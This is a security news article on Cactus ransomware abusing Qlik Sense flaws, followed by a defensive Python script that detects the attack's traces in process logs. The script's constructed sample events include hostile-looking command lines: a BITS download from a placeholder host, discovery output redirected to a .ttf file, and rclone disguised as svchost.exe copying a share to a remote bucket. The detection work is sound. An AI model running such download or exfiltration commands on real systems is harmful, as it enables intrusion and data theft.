Cactus Ransomware Targets Qlik Sense Vulnerabilities to Infiltrate Networks
November 30, 2023
The Cactus ransomware has reportedly been exploiting significant vulnerabilities in the Qlik Sense data analytics tool to gain an initial foothold in corporate networks. Qlik Sense, a versatile platform that supports multiple data sources and aids in creating custom data reports or interactive visualizations, can operate both locally and in the cloud. In late August, the vendor issued security patches for two critical vulnerabilities that affected the Windows version of the platform.
One of these vulnerabilities, identified as CVE-2023-41266, is a path traversal bug that could be exploited to create anonymous sessions and conduct HTTP requests to unauthorized endpoints. The other issue, labelled as CVE-2023-41265 and with a critical severity of 9.8, does not necessitate authentication and can be used to elevate privileges and execute HTTP requests on the backend server hosting the application.
On September 20, Qlik discovered that the fix for CVE-2023-41265 was inadequate and released a new update, tracking the issue as a separate vulnerability identified as CVE-2023-48365. Cybersecurity company Arctic Wolf has recently warned that Cactus ransomware is actively exploiting these vulnerabilities on publicly exposed Qlik Sense instances that have not yet been patched.
The Cactus ransomware attacks observed by Arctic Wolf exploit these security flaws to execute code that prompts the Qlik Sense Scheduler service to initiate new processes. The attackers employ PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and provide remote access to the machine. Furthermore, the attackers execute multiple discovery commands with the output redirected into .TTF files, which Arctic Wolf researchers suspect is a way to retrieve the command output through the path traversal flaw.
The threat actor also uses various methods to stay concealed and gather information, including uninstalling Sophos antivirus, changing the administrator password, and establishing an RDP tunnel using the Plink command-line connection tool. In the final stage of the attack, the hackers deploy the Cactus ransomware on the infiltrated systems.
Additional evidence gathered by Arctic Wolf’s analysts suggests that the threat actors used RDP to move laterally, WizTree to analyze disk space, and rclone (disguised as ‘svchost.exe’) to exfiltrate data. The use of these tools and techniques aligns with what researchers observed in previous Cactus ransomware attacks.
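The behaviours described above (the Scheduler service spawning shells, BITS downloads, discovery output redirected into .TTF files, and rclone renamed to svchost.exe) each leave a trace in process-creation telemetry. The following is an added detection example, not code from Arctic Wolf or Qlik; the log records are constructed, and the Scheduler binary name `Scheduler.exe` is an assumption to adjust for the installed version.

```python
import re

# Constructed process-creation records (Sysmon-style fields); none of these are real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Start-BitsTransfer -Source http://EXAMPLE-HOST/t.zip -Destination C:\ProgramData\t.zip"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "ipconfig /all > C:\ProgramData\q\sys.ttf"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\svchost.exe",   # rclone renamed to look like the service host
     "cmdline": r"svchost.exe copy C:\Share\finance REMOTE:bucket -q"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",  # the genuine service host; must not alert
     "cmdline": "svchost.exe -k netsvcs"},
]

# Assumption: the Qlik Sense Scheduler service runs as Scheduler.exe; adjust to the installed binary name.
SENSE_SERVICES = {"scheduler.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bitsadmin.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TTF_REDIRECT = re.compile(r'>\s*"?[^\s"]+\.ttf\b', re.I)      # command output redirected into a .ttf file
BITS_DOWNLOAD = re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of every rule the record trips, in rule order."""
    hits = []
    if basename(ev["parent"]) in SENSE_SERVICES and basename(ev["image"]) in SHELLS:
        hits.append("qlik-service-spawns-shell")
    if TTF_REDIRECT.search(ev["cmdline"]):
        hits.append("command-output-to-ttf")
    if basename(ev["image"]) == "svchost.exe" and not ev["image"].lower().startswith(SYSTEM_DIRS):
        hits.append("svchost-outside-system32")
    if BITS_DOWNLOAD.search(ev["cmdline"]):
        hits.append("bits-download")
    return hits

def scan(events):
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The svchost rule keys on the binary's location rather than its name, which is what makes a renamed rclone stand out from the real service host.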
To mitigate the risks of a breach, Qlik advises upgrading to the latest versions of Sense Enterprise for Windows. Notably, Cactus ransomware surfaced in March this year and quickly adopted the double-extortion tactic, stealing data from victims before encrypting it on compromised systems. In previous attacks, they exploited Fortinet VPN flaws for initial network access. A report in May by Kroll highlighted the ransomware operation's unique use of encryption to shield the malware binary from detection by security products. The researchers also underscored the use of the AnyDesk remote desktop application, the rclone tool to send stolen data to cloud storage services, and the use of batch scripts to uninstall security products.